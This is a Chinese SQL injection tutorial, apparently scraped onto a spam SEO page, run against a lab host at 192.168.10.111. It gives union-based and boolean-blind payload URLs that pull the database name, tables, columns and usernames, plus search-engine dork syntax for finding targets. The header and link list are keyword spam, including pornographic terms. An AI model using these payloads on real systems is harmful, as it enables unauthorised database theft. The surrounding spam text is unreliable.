中文亚洲精品无码_熟女乱子伦免费_人人超碰人人爱国产_亚洲熟妇女综合网

當(dāng)前位置: 首頁(yè) > news >正文

獨(dú)立網(wǎng)站怎么做推廣google chrome download

獨(dú)立網(wǎng)站怎么做推廣,google chrome download,簡(jiǎn)述網(wǎng)站欄目管理,網(wǎng)站信息登記表一、SQL注入分類 SQL注入根據(jù)攻擊方式的不同,可以分為以下幾種類型: 數(shù)字型注入字符型注入報(bào)錯(cuò)注入布爾盲注時(shí)間盲注聯(lián)合查詢注入基于堆疊的查詢注入 二、SQL注入流程 發(fā)現(xiàn)注入點(diǎn)猜測(cè)字段數(shù)確定顯示字段獲取數(shù)據(jù)庫(kù)信息獲取數(shù)據(jù)庫(kù)中的表獲取表中的字段獲…

一、SQL注入分類

SQL注入根據(jù)攻擊方式的不同,可以分為以下幾種類型:

  1. 數(shù)字型注入
  2. 字符型注入
  3. 報(bào)錯(cuò)注入
  4. 布爾盲注
  5. 時(shí)間盲注
  6. 聯(lián)合查詢注入
  7. 基于堆疊的查詢注入

二、SQL注入流程

  1. 發(fā)現(xiàn)注入點(diǎn)
  2. 猜測(cè)字段數(shù)
  3. 確定顯示字段
  4. 獲取數(shù)據(jù)庫(kù)信息
  5. 獲取數(shù)據(jù)庫(kù)中的表
  6. 獲取表中的字段
  7. 獲取字段中的數(shù)據(jù)
例子:

獲取數(shù)據(jù)庫(kù)名參考

  1. 字符限制:數(shù)據(jù)庫(kù)的名字可以包含字母、數(shù)字、下劃線和美元符號(hào)($)。但是,名字不能以數(shù)字開頭。

  2. 大小寫敏感性:在Windows系統(tǒng)上,MySQL數(shù)據(jù)庫(kù)的名字默認(rèn)是不區(qū)分大小寫的。但在大多數(shù)Unix/Linux系統(tǒng)上,數(shù)據(jù)庫(kù)的名字是區(qū)分大小寫的。為了確??缙脚_(tái)的兼容性,建議使用小寫字母。

  3. 長(zhǎng)度限制:數(shù)據(jù)庫(kù)的名字最大長(zhǎng)度為64個(gè)字符。

1.發(fā)現(xiàn)網(wǎng)站請(qǐng)求為get,如果存在注入點(diǎn)這里不會(huì)報(bào)錯(cuò)
http://192.168.10.111/news/show.php?id=-1 and 1=12.發(fā)現(xiàn)注入點(diǎn)后猜字段,逐一嘗試猜測(cè)字段數(shù)
http://192.168.10.111/news/show.php?id=-1 order by 16
-- order by x 根據(jù)第x個(gè)字段排序,如果出現(xiàn)報(bào)錯(cuò)說明字段不存在3.發(fā)現(xiàn)不報(bào)錯(cuò)出現(xiàn),并且出現(xiàn)的數(shù)值,為顯示字段
http://192.168.10.111/news/show.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,154.脫庫(kù)
//獲取當(dāng)前數(shù)據(jù)庫(kù)
http://192.168.10.111/news/show.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,database(),12,13,14,15//獲取數(shù)據(jù)庫(kù)中的表,hex的作用是因?yàn)槠唇雍蟮淖址小?’會(huì)混淆
192.168.10.111/news/show.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,
hex(group_concat(table_name))
,12,13,14,15 from information_schema.tables where table_schema='news'//獲取表中的字段
192.168.10.111/news/show.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,
hex(group_concat(column_name))
,12,13,14,15 from information_schema.columns where table_schema='news' and table_name='news_users

三、sql盲注:

構(gòu)造真或者假的問題對(duì)數(shù)據(jù)庫(kù)進(jìn)行提問

尋找sql注入點(diǎn)

1.在url后添加? ?’? 如果報(bào)錯(cuò)說明有注入點(diǎn)

2.對(duì)數(shù)值型注入點(diǎn)可以進(jìn)行減法

3.對(duì)在url后添加? ?and 1=2? ?如果沒有正常顯示,說明有注入點(diǎn)

例子:
-- 猜測(cè)數(shù)據(jù)庫(kù)長(zhǎng)度
http://192.168.10.111/news/show.php?id=46 and length(database())=4-- 或取當(dāng)前數(shù)據(jù)庫(kù)第二個(gè)字符
http://192.168.10.111/news/show.php?id=46 and substr(database(),2,1)='e'-- 獲取news數(shù)據(jù)庫(kù)中所有表名長(zhǎng)度
http://192.168.10.111/news/show.php?id=46 and length((select group_concat(table_name) 
from information_schema.tables where table_schema='news'))=98-- 獲取表名字符串第一個(gè)字符
http://192.168.10.111/news/show.php?id=46 and substr((select group_concat(table_name) 
from information_schema.tables where table_schema='news'),1,1)='n'-- 獲取news庫(kù),news_users表中字段字符串的字符串長(zhǎng)度
http://192.168.10.111/news/show.php?id=46 and length((select group_concat(column_name) 
from information_schema.columns where table_schema='news' and table_name='news_users'))=24-- 獲取字段第一個(gè)字符
http://192.168.10.111/news/show.php?id=46 and substr((select group_concat(column_name) 
from information_schema.columns where table_schema='news' and table_name='news_users'),1,1)='u'-- 獲取username字段中的信息長(zhǎng)度
http://192.168.10.111/news/show.php?id=46 and length((select group_concat(username) from 
news.news_users))=5-- 獲取username字段的字符
http://192.168.10.111/news/show.php?id=46 and substr((select group_concat(username) fromnews.news_users),2,1)='d'

?

注:查找網(wǎng)站資源可使用hacking語(yǔ)法

inurl:?id=????????????????url中存在:?id=

Intitle:admin? ? ? ? ? ? title中存在:admin

filetype:txt? ? ? ? ? ? ? ? 查找網(wǎng)站中txt文件

site:www.baidu.com 在百度中查找

http://www.risenshineclean.com/news/39332.html

相關(guān)文章:

  • 網(wǎng)站開發(fā)的前端框架有哪些口碑營(yíng)銷的案例及分析
  • 視頻網(wǎng)站怎么做算法上海seo外包公司
  • 做搜狗網(wǎng)站優(yōu)化南京seo推廣
  • 定州網(wǎng)站建設(shè)公司最新網(wǎng)絡(luò)營(yíng)銷方式有哪些
  • wordpress簡(jiǎn)介怎么改東莞seo收費(fèi)
  • 手把手教做網(wǎng)站做國(guó)外網(wǎng)站
  • 順德網(wǎng)站制作seo課程培訓(xùn)要多少錢
  • 做網(wǎng)站一個(gè)月能掙多少錢網(wǎng)絡(luò)營(yíng)銷師證書含金量
  • 深圳網(wǎng)站優(yōu)化團(tuán)隊(duì)長(zhǎng)春網(wǎng)站優(yōu)化服務(wù)
  • html可視化編輯軟件東莞網(wǎng)站優(yōu)化公司哪家好
  • 做網(wǎng)站用哪個(gè)軟件寫比較好免費(fèi)優(yōu)化網(wǎng)站
  • 雄縣網(wǎng)站建設(shè)免費(fèi)海報(bào)模板網(wǎng)站
  • 網(wǎng)站備案后可以更換域名嗎網(wǎng)絡(luò)營(yíng)銷是學(xué)什么
  • 濟(jì)南網(wǎng)站優(yōu)化公司拼多多seo是什么意思
  • 360網(wǎng)站建設(shè)公司哪家好查詢關(guān)鍵詞網(wǎng)站
  • 哈爾濱網(wǎng)站建設(shè)資海海外市場(chǎng)推廣做什么的
  • 中學(xué)網(wǎng)站管理系統(tǒng)下載不受限制的搜索引擎
  • 邯鄲做網(wǎng)站優(yōu)化百度網(wǎng)盤手機(jī)app下載安裝
  • 寶雞營(yíng)銷型網(wǎng)站開發(fā)信息流優(yōu)化師工作內(nèi)容
  • 深喉嚨企業(yè)網(wǎng)站系統(tǒng)網(wǎng)絡(luò)營(yíng)銷渠道策略有哪些
  • 男男互做網(wǎng)站泰國(guó)推廣網(wǎng)站有效的方法
  • 網(wǎng)站建設(shè)合同有效期河北網(wǎng)站seo外包
  • 手機(jī)購(gòu)買網(wǎng)站源碼軟文推廣怎么寫
  • 視頻網(wǎng)站如何做推廣搜索引擎大全網(wǎng)站
  • 天津外貿(mào)營(yíng)銷型網(wǎng)站建設(shè)公司seo頁(yè)面鏈接優(yōu)化
  • 平面設(shè)計(jì)班seo優(yōu)化廣告
  • 買cms做網(wǎng)站seo推廣軟件品牌
  • 香港外貿(mào)網(wǎng)站建設(shè)谷歌搜索引擎網(wǎng)址
  • 網(wǎng)站子頁(yè)怎么做如何能查到百度搜索排名
  • 北京大學(xué)學(xué)術(shù)學(xué)風(fēng)建設(shè)網(wǎng)站網(wǎng)站運(yùn)營(yíng)優(yōu)化培訓(xùn)